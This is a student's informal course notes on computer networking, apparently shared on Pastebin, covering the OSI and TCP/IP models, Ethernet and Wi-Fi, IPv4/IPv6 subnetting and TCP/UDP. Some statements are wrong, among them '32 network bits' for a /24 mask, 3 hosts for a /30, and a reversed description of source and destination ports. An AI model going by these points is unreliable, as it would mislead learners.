Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Week 1
- IP Address
- IPv4 (32 bit), IPv6 (128 bit)
- Static (entered manually)
- DHCP (dynamic)
- Ipconfig to find your address
- College only uses IPv4
- 169 is invalid IP, it is merely placeholder while unable to find a real one
- Network Models
- OSI Model
- Ideal
- 7. Application
- PDU: Data
- Defines rules (protocols) for applications to use the web
- Some Protocols include:
- HTTP, DNS, DHCP
- 6. Presentation
- Common representation of data to enable devices to communicate
- Some protocols include
- MPEG, QuickTime, JPEG
- 5. Session
- Organize dialogue and manage data exchanges
- 4. Transport
- PDU: Segment
- IP Address + Port Number = socket
- Takes apart and reassembles data segments
- Some protocols include
- TCP
- UDP
- 3. Network
- PDU: Packet
- IP address to exchange individual pieces of data over the network between identified end addresses
- Some protocols include
- IPv4, IPv6, IPX, Appletalk, ICMP
- Router is a layer 3 device
- 2. Data Link
- PDU: Frame
- Addressing is MAC address (physical)
- It exchanges data frames between end devices over common media
- Switches are a layer 2 device
- Some protocols include
- Ethernet, Token Ring, Wireless, Frame Relay
- 1. Physical
- PDU: Bit
- Transmission over the medium (copper, fibre, air waves)
- Repeater and hubs are layer 1 devices
- Cables
- UTP, STP, CAT5, etc
- Signalling, voltages, bandwidth
- TCP/IP Model
- What is actually implemented
- 4. Application
- 3. Transport
- 2. Internet
- 1. Internet Access
- OSI TCP/IP
- Application Application
- Presentation
- Session
- Transport Transport
- Network Internet
- Datalink Network Access
- Physical
- Protocols
- Pre-established rules to communicate properly
- Technology independent they don’t care what technology they run through
- Each application has its own protocol
- Application layer (data)
- http, https, smtp, ftp, pop, dns, dhcp, VoIP
- Transport Layer (segments)
- TCP, UDP
- Internet Layer (packets)
- IPv4, IPv6, ICMP
- Network Access Layer (frames)
- Ethernet (LAN), PPP, Frame Relay (WAN), ARP
- Standards
- IETF
- Anything that is software tends to be these guys
- Layers 7 through 3 of OSI model
- IEEE
- Anything that is electrical tends to be these guys
- Addressing
- Layer 4 (transport layer – end devices)
- Port numbers for delivery to correct application.
- Layer 3 (Network Layer – routers)
- IP addresses for delivery of a message to the correct network
- IP addresses have the network and device address
- Layer 2 (Data Link Layer – switches)
- MAC address for delivery of a message to correct device within the same network
- Week 2
- Circuit Switched Networks
- Reserve dedicated channel for entire communication
- Think old telephone lines
- Inefficient use of resources and are not fault tolerant
- Packet Switched Networks
- No dedicated channel, it is all virtual
- Communications get broken into small pieces of data (segmented)
- Each packet goes through a different route over the network to be reassembled at destination
- Seeks most efficient route over network
- In TCP can retransmit dropped packets
- It multiplexes (breaks up and orders data across medium to be sent out )
- Four Key characteristics of A Network
- Fault Tolerance
- If cable or communication breaks another piece of hardware can replace it on the fly
- Scalable
- Can add more users, put more traffic, and expand without having to rebuild
- Quality of Service
- Guarantees certain levels of service
- Can buffer messages when network is congested
- Identify specific services to prioritize communication
- Security (CIA)
- Confidentiality
- Information is only revealed to intended source
- Integrity
- Data arrives as is
- Availability
- Service must be available so must have alternate routes set up
- Logical versus Physical topography
- Physical
- Location of equipment, wires, end devices
- Logical
- Represent different information, how computers are connected, the networks they belong to
- Network Types
- LAN
- Network infrastructure that provides access to users
- Usually managed/owned by one organization
- High speed access
- WAN
- Network that provides access to other networks across far distances
- Third parties usually involved
- Connects LANs at slower speeds
- Home Network
- Switch
- Portion of router
- Access point (for wireless signal)
- Router
- Switch
- DHCP server
- Provisions IP addresses
- NAT
- Associates your IP with a public IP as well as port numbers
- Translates private addresses to public
- Only internet IP is known to outside networks all private sockets are hidden
- Routers maps these connections keeping track of which port is associated with internal and external same with IPs
- Nested infrastructures
- Internet
- Worldwide collection of interconnected networks
- Extranet
- Computer network that allows controlled access to specific authorized users
- Intranet
- Often used for private connection of LANs and WANs
- Usually employees or tied to the organization somehow
- Encapsulation/De-encapsulation
- Encapsulation
- Process of preparing data for sending
- Adds layer specific header/addressing information
- Each layer of the TCP/IP model has its own specific addressing information
- Data Segment Packet Frame Bit
- Think KFC
- Chicken (data) pieces cut up (segment) the bucket (packet) the plate (packet) frame (on your fork) bit (chewed off bit in your mouth that’s totally finger licking good)
- De-encapsulation
- Process received data
- Each layer examines the specific tag and passes up to next layer
- Original data is reassembled
- TCP/IP Protocols
- Segmentation of messages into small pieces
- Reassembly of messages at the destination
- Connection establishment and tear down for TCP communication
- Flow control for TCP communication
- Lab 2
- Simplex
- Communication over network that is one-way only
- Example: broadcast radio
- Half-Duplex
- Two-way communication but must take turns
- Example: Walkie talkie
- Full-Duplex
- Full two-way communication
- Example: Modern Ethernet
- Framing
- Taking a piece of information from the upper layer and encapsulating it with layer specific information
- Protocols
- Pre-established rules that govern communication
- Point-to-point connection
- Communication between two nodes and endpoints (two end devices)
- Point-to-multipoint connection
- Communication between one node to many
- Attenuation
- The farther you are from the source the more noise on the line
- Lab 3
- Cables
- Straight-through cables
- Use for switch to router
- Computer to switch
- Computer to hub
- Crossover cable
- Switch to switch
- Switch to hub
- Hub to hub
- Router to router
- How to get to network settings
- Start Run ncpa.cpl
- Wireshark
- Capture Options choose interface
- Top Pane
- Packet list
- Middle pane
- Packet Details
- Lower Pane
- Packet bytes
- ICMP
- Ping format
- Type,
- In the code it goes from 1 to 16 from echo reply to information reply
- code
- from 1 to 12 and says what happened
- from net unreachable to destination host unreachable for type of service
- checksum
- Eagle Server
- Virtual machine running as a server
- Eagle server to router
- Straight through
- Router to router
- Cross over
- Week 3
- Layer 1. Physical Layer
- Terminology
- Analog Signal
- Continuous, no breaks or interruptions
- Digital Signal
- Not continuous but more approximations pending on the bit value representing them
- ASCII
- American Standard code for Information Interchange
- Can only have a maximum of 256 different values
- UTF-8
- Replaced it as it is now the multilingual standard
- Bit (b)
- Basic unit of information it is a 0 or 1
- Byte (B)
- Also known as an octet
- It is the most common unit of code
- Digital Transmission
- Physical transfer of data over point-to-point or point-to-multipoint communication
- Cooper, optical, or wireless transmission
- The message is represented via a sequence of pulses representing a 0 or 1
- Modulation
- Process of varying one or more properties of periodic waveforms
- Takes an analog waveform and finds a way to digitize and convey it to another source
- There are several ways in doing this
- PSK (phase-shift keying)
- Digital modulation that changes the phase of a reference signal (carrier wave)
- I have no idea
- FSK (frequency-shift keying)
- Frequency modulation is encoding information by varying the frequency of the wave
- ASK (amplitude-shift keying)
- Varying the strength of the carrier in proportion to the waveform being sent
- QAM (quadrature amplitude modulation)
- Combines two shift keys
- Line code
- Digital baseband is a code chosen within baseband transmission
- Ethernet uses linecode
- Carrier Signal
- Carrier is a waveform that is modulated with an input signal to convey information
- Carrier is to transmit information through space
- it is much higher in frequency than the input signal
- input signal (what you want to transmit) + carrier (type of transmission) = modulated signal (signal sent modulated over media)
- Keying
- Modulation forms where modulating signal takes one of a specific number of values at all times
- Modem
- Modulator-demodulator
- Modulates signals to encode digital information and demodulates signals to decode to transmitted information
- Bit rate (b/s)
- Bits over a unit of time
- Symbol rate (baud rate – Bb/s)
- Number of symbol changes made to the transmission medium per second using digitally modulated signal or line code
- Symbol is measured in “baud”
- L = 2n (symbol is 2 to the power of n (bits per symbol)
- So a baud rate of 8 would have three bits (0,0,0 has 8 possible values)
- Baud is essentially the possible amount of changes in value
- Baseband
- Signalling processing baseband are transmitted without modulation
- No shift in range of frequencies of the signal
- This is LAN (local area network). Doesn’t need modulation since it isn’t worrying so much about attenuation
- Digital baseband transmission
- Line coding
- Aims to transfer a digital bit stream
- Broadband
- Wide bandwidth data transmitted over multiple signals and traffic types simultaneously
- Can do so over different “channels”
- Payload
- The cargo that you want to transmit
- Bandwidth
- The capacity of a medium to carry data. This is the raw data in ideal situations
- Throughput
- Measure of the transfer of bits across the media over a given amount of time
- This takes into account traffic and distance
- Goodput
- Measure of usable data transferred over given time
- Takes into account all the application processing, encapsulation, etc
- Compression
- Lossy
- Inexact approximations of data
- Used to reduce time data takes to send and assemble
- Lossless
- Perfectly reconstructed in exactly the manner it was de-assembled
- Synchronization
- Devices must be able to accurately interpret 0s and 1s so there’s two ways of sending the clock to synchronize
- Asynchronous
- Two clocks
- Synchronous
- One clock
- Clock is embedded with data
- Manchester
- Return to Zero
- 4B5B
- Data Rate Limits
- Shannon capacity C
- Bit Rate = C = B*log2¬(1 + SNR)
- Nyquist bit rate
- Bit Rate = 2*B*log2L
- Physical Layer Tasks
- Takes frame from Data Link Layer
- Sees the frames as bits, not structure
- Represents bits as signals and sends them to the media
- Encoding and Signalling
- NRZ (Never return to zero)
- Very simple 1 is high, 0 is low
- Voltage does not return to zero
- Problems
- Long string of 0s or 1s can cause sync errors
- Problems with interference
- Manchester
- Voltage changes in the middle of each bit period
- Rising means 1, falling means 0
- Change between period is ignored
- The transition matters, not the voltage
- Not efficient for higher speeds
- Fast Ethernet
- 100BaseT
- Coding 4B5B
- Bits are grouped then coded
- 4 bit to 5 bit
- Each possible 4 bit pattern as its own code
- Extra bits for error transmission or start/end transmissions
- Coaxial Cable
- Central conductor insulation copper braid shield outer jacket
- Think TV cable
- Pros
- High frequency radio/video signals
- Used for antennas and cable TV
- Formally used in Ethernet LAN but UTP was cheaper and more efficient
- UTP Cable
- Unshielded Twisted Pair
- 8 wires twisted together into 4 pairs with an outer jacket
- Commonly used for Ethernet LANs
- RJ45 Connectors is what is usually used for Ethernet
- Straight through
- Connect devices of different types
- Crossover
- Connect devices of same type
- STP (Shielded Twisted Pair
- Wires are shielded against noise
- Much more expensive than UTP
- Used for 10Gbps Ethernet
- Copper
- Signals are affected by
- Attenuation
- Signals lose strength as it travels
- Noise
- Electrical signals on copper
- Electromagnetic (EMI)
- Radio Frequency
- Crosstalk (from other wires)
- Mitigating noise
- Metal shielding around cables
- Twisting pair of wires cancels effects
- Avoid areas of problem
- Careful termination
- Incorrect installation
- Could become lightning rod for noise
- Incorrect termination
- UTP length
- Cannot exceed 100M in total length
- Permeant cable cannot exceed 90m
- Gives 10m for patch cables at work area
- Fibre Optic
- Uses light signals for 1s and 0s
- Two technologies
- Single Mode
- More expensive
- Uses laser for transmitting
- Convert light to electricity
- Up to 100KMs
- Multimode
- Less expensive
- Uses LED
- Convert light to electricity
- Few KM distance
- No RFI/EMI noise problems
- Full duplex requires two fibre strands
- Wireless
- Electromagnetic signals at radio and microwave fervencies
- No cost of installing cables
- Hosts free to move around
- Lab 4
- Ethernet
- Most common LAN technology
- Different media
- Copper cable, optical fibre
- Ethernet Frame
- Frame Header
- Preamble Start of frame delimiter Destination Address Source Address Length Packet Data Frame Check sequence
- Timing and Start Addresses Layer 3 protocol Packet Check and stop
- Packet Trailer
- Error Detection Frame Stop
- Frame Fields
- Preamble
- Wake up call
- Help synchronization and show where frame starts
- Destination
- MAC address of destination
- Source
- MAC address of sender
- Length/type
- Length of packet
- Type
- 0800 IPv4
- 0806 ARP
- 86DD IPv6
- Data
- Layer 3 protocol data unit (usually IP)
- If packet is less than 46 bytes padding is applied
- Trailer
- FCS, CRC information for corrupt frames
- Ethernet
- MAC address is unique to every NIC
- Burned into ROM but copied into RAM
- First three bytes identify the manufacturer
- Organizational Unique Identifier (OIC)
- This is the physical address per se
- Switch reads destination MAC to forward the frame
- It is 12 hex digits
- MAC is 48 bits
- Unicast, Multicast, broadcast
- Unicast
- Message for one particular host
- Broad cast
- 255. All hosts on a network
- Multicast
- For a group of devices
- Address Resolution Protocol (ARP)
- Allows a device to discover the MAC addresses on the same-subnet
- ARP requests do not pass the router
- Week 4
- Layer 2
- At each hop a new media dependent frame is created while the original packet is unchanged
- A hop is on each router
- The PDU is frame
- Most widely used Layer 2 Standard – Ethernet
- Layer 2 is about delivery of messages between devices connected to the same network segment
- Its primary function is to move messages throughout the network to their intended destination using the MAC addresses
- Media
- Copper, fibre, wireless
- Deals with MAC addresses
- Switch is a layer 2 device
- Forward frames only to destination
- Minimize connections and give more bandwidth
- Every port has its own bandwidth (every port is its own collision domain)
- Hub is a layer 1 device
- Receives a bit and retransmit the frame to all outgoing ports
- One collision domain
- Wireless access point is a layer 2 device
- Bridge is a layer 2 device
- Layer 2 Services
- Links upper layers (Network and Transport) to Physical media
- Logical link control (LLC)
- Sets up the frame header and trailer to encapsulate the packet
- Controls the hardware at Physical layer
- Marking the start and end of a message
- Detecting and sometimes corrects errors in transmission
- Media Access control (MAC)
- adds layer 2 devices, marks frame start and end
- process of controlling when nodes (end devices) can transmit on physical media
- layer 2 supports logical topologies
- Network Topography
- Logical (Data Link)
- Represent how data link layer sees other devices
- Physical
- Represents how devices are physically inter-connected
- Point-to-point
- End device network end device
- Multi-Access
- A data-bus (think Christmas lights) with nodes connecting to it
- Contention based (collisions)
- Controlled (high overhead)
- Ring
- A ring of nodes connected to one another
- Protocol and standards
- IEE (for all)
- 802.2 Logical Link Control
- 802.3 Ethernet (probably key to remember)
- 802.5 Token Ring
- 802.11 Wi-Fi (probably key to remember
- Media Independence
- Data Link layer handles the media on behalf of the Upper Layers
- It is what bridges hardware and software
- Multi-Access Topology
- Contention Based (collisions)
- No control at all would cause frames to be corrupted due to collisions
- Examples
- Ethernet
- Trailer is the frame check sequence
- CRC is cyclic redundancy check
- Foot print of frame
- First thing device does is that it verifies CRC
- If matches there was no corruption
- Wireless
- Controlled (high overhead)
- Must use ways to prevent collisions
- Examples
- Token Ring, FDDI
- The Frame
- For Ethernet: See Lab 4
- Wi-Fi Frame
- Preamble PLCP Header MPDU (Mac PDU)
- Frame Control Duration ID Add 1 Add 2 Add 3 Sequence control Add 4 Frame Body FCS
- Add = address
- LAN wireless protocol
- Fragile environment
- A lot of collisions
- Every transmission needs to be acknowledged
- Un acknowledged frames are retransmitted
- Lots of control mechanisms in frame
- CSMA/CD
- Host does not know about the line being in use
- Many collisions are the result of delays as it takes time for signals to travel
- If there is no carrier it will send but doesn’t know the frame is on the wire
- Used only for Ethernet
- Smallest legal byte size on frame is 64
- Anything less will be dropped thinking it was merely a fragment from collisions
- Listens before transmitting
- If signal is detected it will wait and return to listen
- If no signal is detected it will transmit then listen for collisions
- This is a backoff algorithm
- CS
- Carrier sense
- Listen to see if signals are on cable
- MA
- Multiple access
- Hosts share same cable
- CD
- Collision detection
- Collision domain
- Hub
- is essentially “one wire” so every interface of a hub is considered one collision domain
- Forwards frames through all ports except incoming
- Switch
- Every port on a switch is its own collision domain
- Forwards frames only to the destination once address is known
- A switch has five functions
- Selective forwarding
- Through its switching table
- Builds addresses with MAC and IPs
- Learning
- Learns addresses as they become known
- Flooding
- Sends addresses out every port if it doesn’t know destination
- Aging
- Deletes addresses not in use over a time
- Filtering
- When knows address will only use that address
- When addresses are set as “only allowed” it will only take info from those addresses (all addresses are MAC )
- Router
- A router is essentially a layer 3 switch and each output is a new network therefore new collision domain
- CRC
- Is calculated at each device
- Once per hub
- Twice per router
- Lab 6
- IP
- Internet protocol
- ICMP
- Ping
- TTL
- Time-to-live
- For the IP packet it is a number
- TTL decrements at each hop (router)
- When it hits zero packet is dropped
- Prevents indefinite forwarding
- Router
- Sole purpose is to pass traffic from one network to another
- Connects two networks together
- Four types of routing protocols
- Dynamic
- Learns on the fly
- Static
- Never changes
- Default
- Default gateway
- If no addresses are known will send traffic out this route
- Directly Connected
- Wired to router
- Arp cache
- MAC to IP
- Week 7
- Layer 3 Network / Internet Layer
- Layer 3 Role
- Provide addressing scheme to identify networks/individual hosts
- Encapsulate segment from layer 4 into a packet
- Direct packets through the network
- De-encapsulate and give it to layer 4
- Layer 3 protocols
- IPv4
- Most common
- IPv6
- Successor of IPv4
- ICMP (ping)
- IP characteristics
- Designed with low overhead for speed
- Connectionless (does not wait for acknowledgement)
- Best effort (similar to UDP)
- Independent of media
- Layer 3 Encapsulation
- Segment is encapsulated with IP header and trailer
- Packing routing
- Responsible for sending to other routers
- Iv4 Header Fields
- Byte 1 Byte 2 Byte 3 Byte4
- Version IHL Type of Service Packet Length
- Identification Flag Fragment Offset
- Time to Live Protocol Header Checksum
- Source Address
- Destination Address
- Options Padding
- IPv4 Header Fields
- Source and destination IP which is 32 bit
- Destination address
- Time to live
- Protocol
- Which protocol is being used
- Quality of Service
- Prioritizes traffic
- Header Checksum
- Checking to see if the header has been corrupted
- Flag
- Only used in exceptional cases for error detection
- Version
- IPv4 or IPv6
- Header length
- Packet length
- Including the header
- Splitting up networks
- Too large to manage efficiency so break it up
- Too much broadcast traffic causes congestion
- Too many addresses for switch to remember
- Lack of security
- Splitting up the networks – how?
- Geographically
- Different sites
- Purpose
- What software is shared between organizations
- Ownership
- Different companies or departments on their own server
- IPv4 Address Anatomy
- Hierarchical addresses
- 32 bits
- 4 octets
- Written in decimal format
- Network part is the host
- Prefix mask says how many bits represent network
- Length of network can vary
- Anatomy of a Subnet Mask
- Subnet mask
- 32 bits
- 1s indicate network bits
- 0s indicate host bits
- Mask is always from left to right
- Default Gateway
- Each PC is configured with an IP address and default gateway
- Router default gateway is the IP address of a router port on the same network as the PC
- Router’s job to handle messages to other networks
- Hops
- Packet may pass through many routers on its journey
- Each router is a hop
- Routing Table
- Each router has its own routing table that has the known networks
- Router looks at the IP address of a packet then decides which network address it is on
- If it knows the address it sends it
- If it doesn’t know the address it sends to default gateway
- If it doesn’t have a default gateway then it doesn’t send the packet merely drops it
- Directly connected sources show up as C
- Statically configured is shown as S
- Default configured by admin is S*
- Learned from another router using RIP is R
- Routing Process
- De-encapsulates the frame
- Extracts destination IP from the packet
- Performs look up of routing table
- Static Routes Dynamic Routes
- Entered by Administrator Learned from other routers
- Time consuming, different for each router Start the protocol (DHCP) and it runs by itself
- Must be updated if routes change Automatically updates itself
- Little processing More processing
- No bandwidth is used Uses bandwidth
- Gives nothing away Gives away information
- IPv6
- IPv4 issues
- Depletion
- Lack of end to end connectivity
- Internet routing table expansion
- Fix
- Increased address space
- Improved packet handling
- Elimination need for NAT
- Integrated security
- IPv6 Packet
- Version Traffic Class Flow Label
- Payload Length Next Header Hop Limit
- Source IP Address
- Destination IP Address
- IPv6 Improvements
- Improvements over IPv4 header
- Better routing efficiency and performance
- No requirements for processing checksums
- Simplified
- Flow label field as per-flow processing to let routers know to send as is
- IPv6 Fields
- Header Fields
- Version
- IPv6 (0110)
- Traffic Class
- It is used for congestion control. Essentially priority
- Flow Label
- Real time applications to send router information to forward as is without storing
- Payload Length
- How big the packet is
- Next Header
- Indicates the data type of the payload is carrying
- Public Address
- Modified IPv4 blocked out a couple of addresses to use over the internet
- Cannot send packets that have a source or destination IP with a private address
- Lab 7
- A subnet mask with /24 is the same as a subnet mask as 255.255.255.0 which is the same as 11111111111111111111111100000000 (32 network bits, 8 host bits)
- IPv4 Addressing Conversion
- 32 bit IPv4 binary to dotted decimal
- 0.0.0.0
- Three different types of addresses
- Network Address
- Address that is the network statement
- All addresses within the same network share this address
- Host Addresses
- All addresses assigned to the host in the network
- Broadcast address
- Sends to all hosts within the network
- Calculations
- Network address
- All host bits are 0s
- Broadcast
- All host bits are 1s
- Host address
- Network +1 to broadcast -1
- Number of hosts in network = 2 32-n=h-2
- Perform calculations for 192.168.15.100/24
- Network address (all host bits are 0)
- 192.168.15.0
- Broadcast address (all host bits are 1s)
- 192.168.15.255
- Host range
- 192.168.15.1 to 192.168.15.254
- Perform calculations for 172.16.10.254/16
- Host address
- Network + 1 to broadcast -1
- 2 32-16=16-2
- 192.168.1.100/25 to binary
- 11000000.10101000.00000001.00000000
- 192.168.1.128 is the network address
- Because the last 00000000 becomes 10000000
- Range becomes 192.168.1.129 to 192.168.1.254
- Basic Subnetting
- Allows creating multiple networks from a single address block to maximize address efficiency
- Every borrowed bit becomes a set of subnets 2b
- Subnet masks
- Masks Number of hosts Host bits
- 255.255.255.0 254 hosts 8
- 255.255.255.128 126 hosts 7
- 255.255.255.192 62 hosts 6
- 255.255.255.224 30 hosts 5
- 255.255.255.240 14 hosts 4
- 255.255.255.248 6 hosts 3
- 255.255.255.252 3 hosts 2
- Network address will always be an even number
- First host is always an odd number
- Last usable address always an even number
- Max you can have is /30 because after that it is too few digits
- To calculate quickly the next subnet you just add the amount of the next 1
- So for a /25 subnet it ends at 191 as its broadcast address
- So for a /25 you merely add 64 (the value of the next bit) to get the next subnet, and so on
- /27 would have 8 subnets (0, 32, 64, 96, 128, 160, 192, 224
- 192.168.0.64/27 (11000000.10101000.00000000.010 00000)
- First usable is .65 (11000000.10101000.00000000.010 00001)
- Last usable is .94 (11000000.10101000.00000000.010 11110)
- Broadcast is .95 (11000000.10101000.00000000.010 11111)
- 256
- /25 /26 /27 /28 /29 /30 /31 /32
- Network Size 128 64 32 16 8 4 2 1
- .128 .192 .224 .240 .248 .252 .254 .255
- Subnets 2 4 8 16 32 64
- Special addresses
- Network and broadcast
- First and last address of any network
- Default route
- All zeros. It is a catch all
- Loop back
- 127.0.0.1/8
- Talks to yourself
- Testing
- Link Local
- 169.254.0.0/16
- Test-NET
- 192.0.2.0/24
- Teaching and learning
- IPv4 Addressing
- Classful Legacy
- Class A, B, C, D
- CIDR/Classless
- Method of allocating addresses via subnetting
- NAT (Network Address Translation)
- Allows hosts on private network to “borrow” public address for communicating with outside networks
- NAT translate source IP/source port in layer 3 and 4 PDU and maps it in its table
- Communication Types
- Unicast
- One to one
- HTTP, HTTPS
- Broadcast
- One to all of same network
- ARP
- Directed
- To network broadcast address
- Multicast
- One to many networks
- SSDP, IPTV
- Tracert
- Traceroute is a computer network diagnostics tool for displaying route path and measuring delays
- IPv4 and IPv6 Coexistance
- Dual-Stack
- Tunnelling
- Translation
- IPv6 Address Anatomy
- 128 bit
- Written in hextets xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx
- IPv6 Prefix Length
- Used to indicate network portion
- IPv6 Representation
- Rule1: omit all leading 0s
- Rule2: Omit all zero segments (::)
- IPv6 Address Types
- Unicast
- Uniquely identifies an interface of an IPv6 address
- Global Unicast
- Similar to IPv4 public
- Global unicast are 001 or 2000::/3
- 2001:0DB8::/32 isfor documentation only
- Link Local
- Used to communicate with other devices on same link
- Link == subnet == network segment
- Fe80::/10 is for link-local only
- Loopback
- Used by host to send packet to itself
- ::1/128
- Unspecified Address
- ::/128
- Cannot be assigned
- Used only as source address when it doesn’t matter to the destination
- Unique Local
- Similar to IPv4 private
- FC00:/7 to FDFF::/7
- IPv4 Embedded
- Help transition from IPv4 to IPv6
- Multicast
- Used to send a single packet to multiple destinations
- Only seen as destination address
- FF00::/8
- Assigned Multicast
- Reserved for predefined group of devices
- FF02::1 all-node multicast group
- All IPv6 enabled devices join this group
- FF02::2 all-routers multicast group
- Solicited node multicast
- FF02::1 to FF::/104
- Anycast
- Any unicast address that can be assigned to multiple devices
- Stateless DHCP determines interface ID by EUI-64
- Stateful DHCP interface ID assigned by DHCPv6
- % special identifier and is known as a zone index
- Broadcast Domain
- MAC FF:FF:FF:FF:FF
- Router is the endpoint of the broadcast domain
- Router divides networks into broadcast domains
- AC Intranet Private
- Private network is your personal IP
- Internet is the public IP
- NAT translates all this
- A SRC
- 10.70.172.22
- Port 1026 DST
- 79.125.225.143
- Port 80 SRC
- 205.211.150.161
- 1026
- Week 9
- 802.11
- More commonly known as WiFi
- Operates at Physical layer MAC sublayer
- CSMA/CA
- Operates like a hub
- Shares the same features as a hub
- All nodes connected to access point in same collision domain
- Frame Control Field
- Protocol version Type Subtype To DS From DS More Fragments Retry Power Management More Data WEP Order
- BSS Identfier (BSSID)
- Uniquely identifies each beacon
- Destination Address
- Indicates the MAC address of the final destination to receive the frame
- Source Address
- Indicates the mac address of the original source that created and transmitted the frame
- Receiver Address
- Indicates the MAC address of the next immediate station (STA) on wireless medium to receive frame
- Transmitter Address
- Indicates MAC address of the station that transmitted the frame onto the wireless medium
- Two forms of WiFi
- Ad-hoc mode
- Client to client (peer to peer)
- No central Wireless Access point
- Know as independent Basic Service Set (IBSS)
- Infrastructure mode
- Consist of at least one wireless client (station) and one wireless access point (AP)
- The AP is a bridge to the wired LAN or other wireless STA
- Extended Service Set (ESS)
- Enterprise level (like Algonquin)
- Set of two or more wireless access points connected to the same wired network that shares the same logical network segment and SSID
- Basic Service Set (BSS)
- Single AP
- Small office home office
- Terminology
- SSID
- Service set identifier is the name of the network
- It is the name displayed by the Beacon to let networks know its existence
- Beacon
- Transmitted by an AP ten times per second
- Advertises existence of AP on particular channel(s)
- Access Point (AP)
- Layer 2 device that acts as the bride between wireless clients and wired network
- Bridge
- Network layer 2 device that interconnects two dissimilar network types together using the LLC sublayer
- Station (STA)
- Is a device that has the capability to use 802.11 protocol
- Could be a laptop, desktop, etc
- Distribution System (DS)
- Wireless disruption system is enabling the wireless interconnection of access points
- Allows networks to expand without wired backbone
- Collision Avoidance
- Wireless device employ this by signalling reediness to transmit data
- Wait to be acknowledged by central controller (AP) before transmitting
- When acknowledged it will send
- When it sends it transmits jamming signal to allow its own free air space
- If it detects collision it will fall to wait for a random time
- Standards
- 802.11a
- 5GHz max of 54Mb/s
- Smaller coverage area but less interference
- 802.11b
- 2.4GHz max of 11Mb/s
- Longer range but more interference
- 802.11g
- 2.4GHz max of 54Mb/s
- Longer range but more interference
- Operates of frequency range of b but with bandwidth of a
- 802.11n
- 2.4GHz or 5GHz max of 100Mb/s to 600Mb/s
- Backwards compatible with a, b, g
- 801.11ac
- Simultaneous 2.4GHz and 5GHz max of 450Bm/s to 1.3Gb/s
- Backwards combatable with a, g, b, n
- 802.11ad
- 2.4GHz, 5GHz, 60GHz max of 7Gb/s
- 2.4GHz
- Most used frequency
- Divided between 11 overlapping channels (3 non overlapping at most)
- 1, 6, 11
- 5GHz
- 23 non overlapping channels
- 1 channel is 54MB/s and have to occupy 5 to 6 channels
- Dual-Band AP
- Operate in both 2.4GHz and 5GHz band
- Mixed Mode AP
- Supports different 802.11 versions
- Degradation of throughput though since it is sending both 2.4GHz and 5GHz at once
- Basic Setup/Security
- Authentication
- PSK
- Pre-shared key
- Vulnerable to password cracking
- PSK is personal
- EAP
- Enterprise authentication server
- Encryption
- WEP
- Wired equivalent privacy
- Vulnerable and has been cracked
- WPA
- WiFi Protected Access
- Vulnerable and used TKIP
- WPA2
- WiFi Protected Access II
- Replaced WPA
- Used AES encryption which is approved by the department of defence
- Basic security
- Change router’s password
- Change SSID
- Turn on security WPA2-PSK using AES encryption
- MAC filtering
- WiFi Protected Setup
- WPS network security allows users to easily secure home network without accessing router’s configuration screens or know passphrase
- Week 10
- Layer 4 Transport Layer (segment)
- Defines three general functions
- Segmentation
- Breaking conversations into small pieces
- Reassembly at receiving end
- Multiplexing
- Interleaving the small pieces into shared network
- Identification of segment to be reassembled in correct order
- Error checking
- Made sure that data integrity has been kept
- Some functions the layer 4 transport layers help facilitate
- Email
- Messaging
- Web surfing
- Download
- Layer 4 protocols provide
- Connection-oriented conversations
- Reliable delivery
- Ordered data reconstruction
- Flow control
- Two most common layer 4 protocols
- UDP (non reliable) 8 bytes
- User datagram protocol
- Connectionless
- Best effort
- Low overhead
- Only implements the basic functions
- TCP (reliable) 20 bytes
- Transmission Control Protocol
- Connection oriented
- Guaranteed delivery
- High overhead
- Implement the advanced functions
- Application Port Numbers
- Protocol Purpose Port TCP/UDP
- HTTP Web browsing 80 TCP
- HTTPS Secure Web Browsing 443 TCP
- DNS Reaching dns server to translate IP to English for instance changing the www.google.com to the IP address 53 both
- SMTP Sending email 25 TCP
- Pop3 Receiving email 110 TCP
- telnet Unsecure version of ssh 23 TCP
- FTP File transferring. Operates with two posts. One to send commands, and one to transfer data 21/20 TCP
- DHCP/DHCPv6 Configures the IP addressing in both IPv4 or IPv6 67/68 UDP
- Source and Destination Port
- The destination port is the port of the user that is randomly chosen after the well known ports
- Well known ports are between 0-1023
- Client Server
- Source Destination
- 4456 80
- |Source | destination | data |
- 4456|80|DATA
- |destination|source|data
- 80|4456|data
- TCP/UDP Headers
- TCP segment
- Source port, destination port
- Sequence number
- Acknowledgment number
- Header length, reserved, code bits window
- Checksum urgent
- Options, if any
- Application layer data
- UDP
- Source and destination port
- Length, check sum
- Application layer data
- TCP Protocol Overview
- Implements advanced functions to ensure reliable and guaranteed end to end delivery
- Establishing a Session
- Ensures the application is ready to receive the data
- Same order delivery
- Ensures that the segments are reassembled into the proper order
- Reliable delivery
- Means lost segments are resent so the data is received complete
- Flow control
- Manages data delivery if there is congestion on the host
- Reliability
- TCP connection establishment (SYN)
- TCP segment reassembly
- TCP Acknowledgment and Windowing
- TCP Retransmission
- TCP Congestion control
- Connection teardown (FIN)
- TCP Connection Establishment
- Three-Way Handshake (two channels)
- Send SYN
- Send SYN, ACK
- ACK
- Client
- Selects a source port
- Determines initial sequence number
- Determines destination port and IP (socket)
- Sends segment to server (remote host) with “SYN” flag set
- Server (remote host)
- Determines it’s initial sequence number
- Sends segment to “client” with “SYN” and “ACK” flag set
- Client
- Sends segment to Server with ACK flag set
- Segment Reassembly
- TCP Sequence Number
- TCP Segment ACk and Window Size
- TCP Acknowledgment Number
- Window size determines the number of bytes sent before an acknowledgment is expected
- Acknowledgement number is the number of the next expected byte
- TCP Retransmission
- If ACK is not received in time out period then segment is retransmitted
- Role of sender to track ACKs and retransmit unACK segments
- If this keeps happening window size may be smaller
- TCP ACK and Windowing Summary
- Sequence number is assigned to each byte
- Sender waits for positive acknowledgment of receipt
- If ACK is not received in time out period then segment(s) are retransmitted
- Receiver buffers data and passes it in correct order to application
- ACKs are piggybacked on return transmissions
- TCP Connection Tear-down
- FIN-ACK
- Receive FIN+ACK send FIN+ACK
- FIN + ACK
- Send ACK
- Receive ACK
- Netstat
- Demonstration of netstat
- Netstat –boa
- Gives process identification and sockets that each application is using
- Proto Local Address Foreign Address State PID
- The protocol used. The program that wants access The :## is the port number. This is the address it is bound to. This is where you listen from The computer connected to when it is sent. This is what will reply to you Listening it is a server, established it is connected Corresponds with the task manager. It is the process ID
- TCP 0.0.0.0:80 HouleASUS LISTENING 2524
